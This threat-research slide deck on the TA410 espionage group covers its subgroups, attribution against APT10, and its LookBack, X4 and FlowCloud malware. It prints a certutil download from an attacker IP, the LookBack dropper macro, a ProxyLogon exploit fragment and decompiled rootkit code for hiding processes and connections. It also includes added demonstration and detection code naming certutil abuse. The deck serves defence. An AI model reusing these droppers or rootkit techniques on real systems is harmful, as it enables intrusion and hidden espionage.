TA410: APT10's distant cousin
Alexandre Côté Cyr | Malware Researcher
Matthieu Faou | Senior Malware Researcher
Smokescreen Supply Chain Attack Targets Taiwan Financial Sector, A Deeper Look
Operation Cache Panda: Zero-Day in Financial Software Exploited by China-Linked Threat Group
Valentine’s Day this year saw the end of a truly toxic relationship — a prolonged
supply chain attack targeting the Taiwan financial and securities trading sector
that had begun back in November 2021. Evidence uncovered during a CyCraft
incident response (IR) investigation ties these attacks to APT10 — a China state-
sponsored hacker group widely believed to be associated with the Chinese
Intelligence Agency, the Ministry of State Security (MSS).
The November 2021 attacks disrupted online trading, causing an uproar among
the Taiwan public. At least two securities traders had to halt trading due to the
volume of unusual purchases. Targeted organizations absorbed the financial
losses and suffered the loss of customer trust. In addition, these attacks
influenced and manipulated stock prices, damaging financial transaction
credibility and honesty. If left unnoticed, these attacks could have had a
devastating impact on the financial sector.
The November attacks were originally attributed to password mismanagement
and credential stuffing; however, following a security incident response (IR)
investigation conducted by CyCraft into a second wave of attacks peaking from
the 10th to the 13th of February 2022, new evidence uncovered the exploitation
of a severe vulnerability in commonly used financial software aided by the newly
identified hacking technique, Reflective Code Loading.
Phase 2 — Lateral Movement & Lurking
The attackers used 6 individual malware samples to carry out this attack (only 3 landed,
and the rest were dynamically downloaded and loaded). Each was responsible
for different functions; the overall process is shown in Figure 5 below.
PresentationCache[.]exe is the QuasarRAT loader — an open-source backdoor
used by APT10 in past attack campaigns. First, it registered itself as a service so
that it could reside in the system and load two DLL files, PresentationFrom[.]dll
and PresentationStatic[.]dll.
When PresentationCache[.]exe was executed, it grabbed the x86[.]bin and
DogCheck[.]bin files from the external file download server and injected these
two shellcode files into other processes. These two shellcodes dynamically
loaded the DotNET execution environment and loaded the attacker’s DotNet
Assembly for subsequent actions.
TLP:GREEN
How it started
Magnet of threats
[Diagram: one organization targeted at the same time by Turla, LuckyMouse and Gelsemium]
https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/
• Expression first used by Costin (Kaspersky Labs)
• Designates an organization targeted by several cyber-espionage groups from different origins
certutil.exe -urlcache -split -f "http://43.254.216[.]104/PortableDeviceApi.dll"
A simple backdoor we named X4.
We did not find links to a known threat actor.
C:\ProgramData\Applications\Cache\libcurl.dll
Two months later…
LookBack backdoor
https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks
https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
TL;DR
• We have discovered JollyFrog
• We missed Proofpoint blogposts
• We “re-discovered” TA410
TA410 vs APT10
Clarifying the confusion
Notes on Attribution
Analysts identified similarities between the macros utilized in this campaign and historic APT campaigns targeting Japanese
corporations in 2018 [1]. Moreover, LookBack utilizes an encoded proxy mechanism for C&C communication that resembles a
historic TTP utilized in those campaigns. However, analysts note that the LookBack malware has not previously been associated with a
known APT actor and that no additional infrastructure or code overlaps were identified to suggest an attribution to a specific adversary.
In the attachments identified as part of the July 2019 campaigns, threat actors appeared to utilize many concatenation commands
within the macro to obfuscate the VBA function. It is possible these concatenations were an attempt to evade static signature detection
for the macro strings while maintaining the integrity of the installation mechanism, which had historically been used to target
different sectors and geographies. The below comparison indicates the shared macro content which appears to have been rewritten.
[Screenshot text, cleaned up from OCR; the %windir%/%temp% expansions and the cm.tmp copy name are as legible in the image]
Sub ObjRun(CommandMoveTo As String, CopyTo01 As String, CopyTo02 As String, CopyTo03 As String, AllUsersProfile As String)
    cermoveComand = "cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%\\cm.tmp"
    certutilComand = "cmd.exe /c %temp%\\cm.tmp -decode "
    Set objws = CreateObject("Wscript.Shell")
    objws.Run CommandMoveTo, 0, True
    objws.Run cermoveComand, 0, True
    objws.Run certutilComand & AllUsersProfile & "pense1.txt " & CopyTo01, 0, True
    objws.Run certutilComand & AllUsersProfile & "pense2.txt " & CopyTo02, 0, True
    objws.Run certutilComand & AllUsersProfile & "pense3.txt " & CopyTo03, 0, True
    objws.Run "esentutl.exe /y " & CopyTo01 & " /d " & AllUsersProfile & "cup.exe" & " /o", 0, True
    objws.Run "esentutl.exe /y " & CopyTo02 & " /d " & AllUsersProfile & "libcurl.dll" & " /o", 0, True
    objws.Run AllUsersProfile & "cup.exe", 0, False
    objws.Run "cmd.exe /c del /q " & AllUsersProfile & "*.txt", 0, False
End Sub
Figure 3: Macro utilized in July 2018 campaigns targeting Japanese corporations
[Second screenshot: the macro used in the July 2019 campaigns. It is the same ObjRun routine (copy of certutil.exe to cm.tmp, certutil -decode of the pense*.txt drops, esentutl /y copies to cup.exe and libcurl.dll, del /q clean-up); the legible parts match Figure 3 line for line, only rewritten.]
By Ben Hunter | October 15, 2019
FortiGuard Labs Threat Analysis Report: This blog originally appeared on the enSilo website and is republished here for threat research purposes. enSilo was acquired by
Fortinet in October 2019.
Summary
In April 2019, we detected what we believe to be new activity by the Chinese cyber espionage group APT10. The discovered variants are previously unknown and deploy malware
that is unique to the threat actor. These malware families have a rich history of being used in numerous targeted attacks against government and private organizations. The activity
surfaced in Southeast Asia, a region where APT10 frequently operates.
Overview
Towards the end of April 2019, we tracked down what we believe to be new activity by APT10, a Chinese cyber espionage group. Both of the loader’s variants, as well as the various
payloads that we analyzed share similar Tactics, Techniques, and Procedures (TTPs) and code associated with APT10
Although they deliver different payloads to a victim's machine, both variants drop the following files beforehand:
Among the payloads we found were PlugX and Quasar RATs. The former is well known to be developed in-house by the group with a rich history of being used in many targeted
attacks against different government and private organizations. PlugX is a modular structured malware that has many different operational plugins, such as communication
compression and encryption, network enumeration, files interaction, remote shell operations, and more.
The samples we analyzed originated from the Philippines. APT10 frequently targets the Southeast Asia region.
In this article we examine both versions of the loader along with their payloads, TTPs, and Command and Control (C&C) server information.
TA410 ≠ APT10 / A41APT
(tools named on both sides: QuasarRAT, Korplug)
The Umbrella
[Diagram: three subgroups, FlowingFrog, JollyFrog and LookingFrog; C&C domain on the diagram: ffca.caibi379[.]com]
Victimology
[Map: victim locations by subgroup: FlowingFrog, LookingFrog, JollyFrog]
Initial Access
Spearphishing: FlowingFrog
Royal Road / 8.t RTF builder
Groups shown on the slide as users of Royal Road: Tonto Team, TA410, TA413, TA428, FunnyDream / Chinoxy, SpaceOddity, Rancor, SharpPanda, GoblinPanda
[Figures: hex dump of the encoded 8.t object embedded in the Royal Road RTF document, and its decoded form]
https://github.com/nao-sec/rr_decoder/
Exploit public facing app: LookingFrog and JollyFrog
CVE-2019-0604 (Microsoft SharePoint RCE)
ProxyLogon (March 2021)
ProxyShell (August 2021)
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
[Screenshot: fragment of a public ProxyLogon proof-of-concept script]
# ... -d '' ... new ActiveXObject("WSCRIPT.SHELL").Run("ping ...
HOST = sys.argv[1]
MAIL = sys.argv[2]
LOCAL_NAME = ''
FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\index.aspx'
FILE_DATA = ''
assert len(FILE_DATA) < 255, "file data too long"
def unpack_str(byte_string):
    return byte_string.decode('UTF-8').replace('\x00', '')
def unpack_int(format, data):
    return unpack(format, data)[0]
def get_sid(mail):
    ...
[Screenshot: Orange Tsai’s blog “This is Orange Speaking :)” (Exp.tw), tagged SQL Injection / Vulnerability / Exploit, with its yearly archive 2013–2021; the post shown is “Yahoo Bug Bounty Part 2 - login.yahoo.com Remote…”]
[Screenshot: Microsoft Security Update Guide entry]
Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2021-26855
Released: Mar 2, 2021   Last updated: Mar 16, 2021
Assigning CNA: Microsoft   MITRE: CVE-2021-26855
CVSS:3.0 9.1 / 8.4 (Attack Vector: Network; Attack Complexity: Low; Privileges Required: None; User Interaction: None)
Other Important Exchange updates released 3/2/2021: CVE-2021-26412, CVE-2021-26854
• Microsoft Exchange Server 2013 CU 22 was released February 12, 2019 after which 31 vulnerabilities have been found and remediated.
• Microsoft Exchange Server 2013 CU 21 was released June 19, 2018 after which 38 vulnerabilities have been found and remediated.
• Microsoft Exchange Server 2013 Service Pack 1 was released February 25, 2014 after which 82 vulnerabilities have been found and remediated.
Please see Exchange Server build numbers and release dates for more information on Exchange Server Cumulative Updates release dates.
Acknowledgements: Volexity; Orange Tsai from DEVCORE research team; Microsoft Threat Intelligence Center (MSTIC)
Looking Frog: X4 / LookBack
X4
[Diagram: a VMProtect-ed loader decrypts and injects the X4 Orchestrator (injected in svchost.exe); the Orchestrator injects the Network shellcode (in spoolsv.exe) and executes commands; the Windows registry and C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\Log\rsa.txt are read/written]
X4 Capabilities
LookBack
• screenshot
https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/
LookBack Capabilities
System Information / User Activity / Active Control
Flowing Frog: Tendyron / FlowCloud
Tendyron Downloader
[Diagram: Royal Road document → injects → Tendyron downloader (running in iexplorer.exe) → downloads → a loader and a backdoor based on Farfli/Gh0st (running in iexplorer.exe), and FlowCloud (t86.dat)]
server_config {
product_name: "PCArrowI"
product_version: "v5.0.2"
id: "1202_[REDACTED]"
root: ""
file_server: "47.111.22[.]65"
file_server_port: "80"
file_server_bak: ""
file_server_bak_port: ""
exchange_server: "47.111.22[.]65"
exchange_server_port: "81"
exchange_server_bak: ""
exchange_server_bak_port: ""
file_server_key: "E\367\016\031\314\2637[...]"
xchg_server_key: "8\335\325$\200\233e\363#\346[...]"
file_key: "U\267\323\353\213\261?\242c[...]"
is_audio_only: false
id_prefix: "1202"
}
[Image: O'Reilly “Head First Object-Oriented Analysis & Design” book cover]
Architecture
Over 50 custom classes
FlowCloud Capabilities
System Information / User Activity / Detection Evasion
Audio recording is triggered when the sound level goes above 65 dB (“Ok FlowCloud”)
Rootkit
erase_driver_name_from_list(L"kbdclass.sys", DriverObject, L"\\SystemRoot\\System32\\drivers\\kbdclass.sys");
erase_driver_name_from_list(L"mouclass.sys", DriverObject, L"\\SystemRoot\\System32\\drivers\\mouclass.sys");
if ( getOsVersion(&major_version, &build_number, minor_version) < 0 )
    return 0;
build_number_ = build_number;
if ( build_number == Windows_XP )
{
    // the decompiler reused build_number as the thread handle
    if ( PsCreateSystemThread(&build_number, 0, 0, 0, 0, backdoor_tcp_driver, 0) >= 0 )
        ZwClose(build_number);
    erase_driver_name_from_list(L"tcpip.sys", DriverObject, L"\\SystemRoot\\System32\\drivers\\tcpip.sys");
}
else
{
    if ( build_number >= Windows_Vista )
    {
        if ( PsCreateSystemThread(&build_number, 0, 0, 0, 0, backdoor_nsi_driver, 0) >= 0 )
            ZwClose(build_number);
        erase_driver_name_from_list(L"nsiproxy.sys", DriverObject, L"\\SystemRoot\\System32\\drivers\\nsiproxy.sys");
    }
}

// Process hiding: walk EPROCESS.ActiveProcessLinks using version-specific offsets and unlink the target (DKOM)
if ( getKPROCESSOffsetsForVersion(&offsets) < 0 )
    return status;
active_process_links = (IoGetCurrentProcess() + offsets.ActiveProcessLinks);
iter = active_process_links;
if ( !active_process_links->Flink && !active_process_links->Blink )
    return status;
while ( *(&iter->Flink + offsets.UniqueProcessId - offsets.ActiveProcessLinks) != proc_id )
{
    iter = iter->Blink;
    if ( iter == active_process_links )
        return 0xC0000001;
}
iter->Blink->Flink = iter->Flink;   // unlink; the right-hand sides are not legible in the
iter->Flink->Blink = iter->Blink;   // screenshot and are written here as the standard removal
iter->Flink = iter;                 // the hidden entry is left pointing at itself
iter->Blink = iter;
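The unlink above is the whole trick. As an added illustration (this is example code written for this page, not FlowCloud's driver or any ESET tooling), the following user-mode C models the process-hiding step: a ring of LIST_ENTRY nodes stands in for EPROCESS.ActiveProcessLinks, the same walk-and-unlink removes one node, and a second, independent view of the same processes (a plain array standing in for the kernel's PID table) still sees it. Comparing the two views is how memory-forensics tools flag a process hidden this way. Structure names, the FAKE_EPROCESS layout and the PID values are this example's own assumptions.

```c
#include <stddef.h>
#include <stdio.h>

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Only the two EPROCESS fields the rootkit touches (layout is this example's own). */
typedef struct {
    unsigned long UniqueProcessId;
    LIST_ENTRY ActiveProcessLinks;
} FAKE_EPROCESS;

static FAKE_EPROCESS *eprocess_from_entry(LIST_ENTRY *e) {
    return (FAKE_EPROCESS *)((char *)e - offsetof(FAKE_EPROCESS, ActiveProcessLinks));
}

/* Build the circular list around a sentinel head, the way InsertTailList does. */
void init_process_list(LIST_ENTRY *head, FAKE_EPROCESS *procs, size_t n) {
    head->Flink = head->Blink = head;
    for (size_t i = 0; i < n; i++) {
        LIST_ENTRY *e = &procs[i].ActiveProcessLinks;
        e->Flink = head;
        e->Blink = head->Blink;
        head->Blink->Flink = e;
        head->Blink = e;
    }
}

/* Same walk as the decompiled driver: find the entry whose PID matches, splice it
   out, and leave its own links pointing at itself so a later kernel-side removal of
   the hidden process does not corrupt the list. Returns 0 on success, -1 when the
   PID is not on the list (the driver returns an NTSTATUS failure code there). */
int dkom_hide_process(LIST_ENTRY *head, unsigned long pid) {
    for (LIST_ENTRY *it = head->Flink; it != head; it = it->Flink) {
        if (eprocess_from_entry(it)->UniqueProcessId != pid)
            continue;
        it->Blink->Flink = it->Flink;
        it->Flink->Blink = it->Blink;
        it->Flink = it;
        it->Blink = it;
        return 0;
    }
    return -1;
}

/* What any enumerator that follows ActiveProcessLinks (tasklist, Task Manager) sees. */
size_t count_linked_processes(const LIST_ENTRY *head) {
    size_t n = 0;
    for (const LIST_ENTRY *it = head->Flink; it != head; it = it->Flink)
        n++;
    return n;
}

/* Cross-view check: every process in the table must be reachable by the list walk.
   PIDs that are not are written to `hidden`; returns how many were found. */
size_t find_hidden_processes(const LIST_ENTRY *head, const FAKE_EPROCESS *procs, size_t n,
                             unsigned long *hidden, size_t max_hidden) {
    size_t found = 0;
    for (size_t i = 0; i < n; i++) {
        int reachable = 0;
        for (const LIST_ENTRY *it = head->Flink; it != head; it = it->Flink)
            if (it == &procs[i].ActiveProcessLinks) { reachable = 1; break; }
        if (!reachable && found < max_hidden)
            hidden[found++] = procs[i].UniqueProcessId;
    }
    return found;
}

int main(void) {
    FAKE_EPROCESS procs[4] = { {4}, {1234}, {2048}, {3000} };   /* constructed PIDs */
    LIST_ENTRY head;
    unsigned long hidden[4];

    init_process_list(&head, procs, 4);
    printf("before: %zu processes visible by list walk\n", count_linked_processes(&head));
    dkom_hide_process(&head, 1234);
    printf("after : %zu processes visible by list walk\n", count_linked_processes(&head));
    size_t n = find_hidden_processes(&head, procs, 4, hidden, 4);
    for (size_t i = 0; i < n; i++)
        printf("cross-view: PID %lu is in the table but not on the list\n", hidden[i]);
    return 0;
}
```

The self-pointing Flink/Blink is what keeps the box from blue-screening when the hidden process exits: the kernel's own RemoveEntryList then rewrites the hidden entry's neighbours, which are the entry itself, instead of two unrelated EPROCESS structures.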
RtlInitUnicodeString(&s_Driver_nsiproxy, L"\\Device\\Nsi");
if ( IoGetDeviceObjectPointer(&s_Driver_nsiproxy, FILE_ALL_ACCESS, &nsi_fileObject, &nsi_deviceObject) < 0 )
    return;
nsi_driverObject = nsi_fileObject->DeviceObject->DriverObject;
nsi_DeviceControl = nsi_driverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL];
_InterlockedExchange(&nsi_driverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL], nsi_DeviceControl_replacement);
PsTerminateSystemThread(0);

// Replacement IRP_MJ_DEVICE_CONTROL handler: only the NSI request used to enumerate connections is intercepted
CurrentStackLocation = Irp->Tail.Overlay.CurrentStackLocation;
if ( CurrentStackLocation->Parameters.DeviceIoControl.IoControlCode != 0x12001B
     // used by NsiGetObjectAllParameters (e.g. netstat)
     // Device type: FILE_DEVICE_NETWORK
     // Access check: FILE_ANY_ACCESS
     // Func Code: 6
     // IO Method: METHOD_NEITHER
  || CurrentStackLocation->Parameters.DeviceIoControl.InputBufferLength != 0x3C )
{
    return nsi_DeviceControl(DeviceObject, Irp);
}
Pool = ExAllocatePool(NonPagedPool, 0x34u);
Pool->CompletionRoutine = CurrentStackLocation->CompletionRoutine;
Pool->Context = CurrentStackLocation->Context;
// ... the original completion routine and context are saved in Pool and the rootkit's own
// completion routine is installed in the stack location, so the connection table handed back
// by nsiproxy can be filtered before netstat sees it (the replacement's name is not legible)
[Screenshot: code-signing certificate, revoked by its certification authority]
Issued to: Hangzhou Leishite Laser Technology Co., Ltd
Issued by: WoSign Class 3 Code Signing CA
Valid from 2012-03-29 to 2014-04-02
Jolly Frog: Quasar Rat / Korplug
QuasarRAT, Korplug (aka PlugX)
• DLL side loading
• Abuse F-Secure’s qrtfix.exe
• Encrypted payload on disk
Detection opportunities
Malware delivery via certutil
https://lolbas-project.github.io/lolbas/Binaries/Certutil/
MS SharePoint & Exchange RCE
• Suspicious process tree starting from w3wp.exe, e.g.:
  • .aspx/.exe written on disk
  • several cmd.exe executed in a short period of time
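Both opportunities above (certutil delivery, and a shell tree under the IIS worker) are easy to turn into telemetry checks. The script below is an added example written for this page, not ESET's or any project's code: it runs three rules over process-creation events shaped like Sysmon Event ID 1 and constructed inline, including a renamed certutil copy (cm.tmp, as in the LookBack macro), the PortableDeviceApi.dll download seen at the start of the deck, and a burst of cmd.exe under w3wp.exe. Field names, the 60-second window, the threshold of three and every sample command line are this example's assumptions.

```python
"""Triage rules for certutil abuse and webshell-driven process trees (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# certutil switches that mean download or payload decoding rather than certificate admin
CERTUTIL_FLAGS = ("-urlcache", "-decode", "-encode", "-verifyctl")
WEB_WORKERS = ("w3wp.exe",)
SHELLS = ("cmd.exe", "powershell.exe")

# Constructed sample events (not real telemetry); "original" is the PE OriginalFileName
EVENTS = [
    {"ts": "2022-02-10T10:00:00", "pid": 501, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",
     "original": "Cmd.Exe", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2022-02-10T10:00:05", "pid": 502, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",
     "original": "Cmd.Exe", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "cmdline": "cmd.exe /c net user"},
    {"ts": "2022-02-10T10:00:20", "pid": 503, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",
     "original": "Cmd.Exe", "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -split -f http://43.254.216[.]104/PortableDeviceApi.dll"},
    {"ts": "2022-02-10T10:00:21", "pid": 600, "ppid": 503, "image": "C:\\Windows\\System32\\certutil.exe",
     "original": "CertUtil.exe", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "certutil -urlcache -split -f http://43.254.216[.]104/PortableDeviceApi.dll"},
    # renamed copy of certutil decoding a dropped file, as in the macro
    {"ts": "2022-02-10T10:05:00", "pid": 601, "ppid": 300, "image": "C:\\Users\\u\\AppData\\Local\\Temp\\cm.tmp",
     "original": "CertUtil.exe", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "C:\\Users\\u\\AppData\\Local\\Temp\\cm.tmp -decode C:\\ProgramData\\pense1.txt C:\\ProgramData\\cup.exe"},
    # benign certutil use and a normal interactive shell: no alert expected
    {"ts": "2022-02-10T11:00:00", "pid": 700, "ppid": 200, "image": "C:\\Windows\\System32\\certutil.exe",
     "original": "CertUtil.exe", "parent": "C:\\Windows\\System32\\mmc.exe", "cmdline": "certutil -store my"},
    {"ts": "2022-02-10T11:30:00", "pid": 701, "ppid": 50, "image": "C:\\Windows\\System32\\cmd.exe",
     "original": "Cmd.Exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "cmd.exe"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_certutil(ev):
    """Key on OriginalFileName as well as the image name, so a copy of certutil.exe
    renamed to cm.tmp is still recognised; then look for download/decode switches."""
    if basename(ev["image"]) != "certutil.exe" and ev.get("original", "").lower() != "certutil.exe":
        return None
    tokens = ["-" + t[1:] if t.startswith("/") else t for t in ev["cmdline"].lower().split()]
    hits = [t for t in tokens if t in CERTUTIL_FLAGS]
    return f"certutil abuse ({' '.join(hits)})" if hits else None


def check_web_child(ev):
    """A shell spawned directly by an IIS worker: the usual post-ProxyLogon/ProxyShell tree."""
    if basename(ev["parent"]) in WEB_WORKERS and basename(ev["image"]) in SHELLS:
        return "shell spawned by IIS worker process"
    return None


def check_shell_bursts(events, window_s=60, threshold=3):
    """Several cmd.exe from the same parent within window_s seconds -> [(ppid, count)]."""
    by_parent = defaultdict(list)
    for ev in events:
        if basename(ev["image"]) == "cmd.exe":
            by_parent[ev["ppid"]].append(datetime.fromisoformat(ev["ts"]))
    bursts = []
    for ppid, times in by_parent.items():
        times.sort()
        for i, start in enumerate(times):
            count = sum(1 for t in times[i:] if t - start <= timedelta(seconds=window_s))
            if count >= threshold:
                bursts.append((ppid, count))
                break
    return bursts


def triage(events):
    """(finding, pid) pairs; for bursts the pid is the parent that launched the shells."""
    findings = []
    for ev in events:
        for rule in (check_certutil, check_web_child):
            msg = rule(ev)
            if msg:
                findings.append((msg, ev["pid"]))
    for ppid, count in check_shell_bursts(events):
        findings.append((f"cmd.exe burst: {count} launches from one parent", ppid))
    return findings


if __name__ == "__main__":
    for msg, pid in triage(EVENTS):
        print(f"[{pid}] {msg}")
```

Note that the renamed-copy case only works if the sensor records the PE OriginalFileName (Sysmon does); a rule that matches on the image path alone misses cm.tmp entirely, which is exactly why the macro copies certutil before calling it.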
Royal Road
• Relies on N-day exploits
• Updating MS Office is “enough” (and theoretically easier than a server application)
LookBack custom network protocol – Snort rules
https://github.com/eset/malware-ioc/ta410
Conclusion
• Umbrella composed of 3 subgroups
• Initial access
• Complex custom backdoors
• Targeted espionage
www.eset.com | www.welivesecurity.com | @ESETresearch
Alexandre Côté Cyr | Malware Researcher | alexandre.cote@eset.com | @barberousse_bin
Matthieu Faou | Senior Malware Researcher | matthieu.faou@eset.com